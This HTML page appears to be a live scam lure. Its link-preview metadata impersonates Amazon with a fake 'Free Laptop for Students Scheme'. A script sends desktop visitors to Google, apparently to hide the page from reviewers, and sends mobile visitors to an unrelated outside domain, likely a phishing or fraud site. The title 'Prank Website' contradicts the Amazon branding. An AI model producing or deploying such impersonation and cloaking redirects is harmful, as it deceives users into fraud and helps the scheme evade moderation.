
<!DOCTYPE html><html><head>
    <meta name="robots" content="noindex, nofollow">
     
        <script>
            if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
             } else {
             window.location.href = "https://www.google.com";
             }
         </script>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Prank Website</title>
        <meta name="og:title" content="Amazon Free Laptop for Students Scheme" />
        <meta name="og:url" content="https://www.amazon.in/" />
        <meta property="og:description" content="Click here to register" />
        <meta property="og:image" content="https://amacdn.pages.dev/ogimage.jpg" />
        <meta name="robots" content="noindex" />
        <meta name="theme-color" content="#ffffff" />
       
      <script type="text/javascript" charset="utf-8">location.href="https://laptop.zaget.cc/#";</script>
    
    </head><body>
      
      <script type="text/javascript" charset="utf-8">location.href="https://laptop.zaget.cc/#";</script>
      
      </body></html>
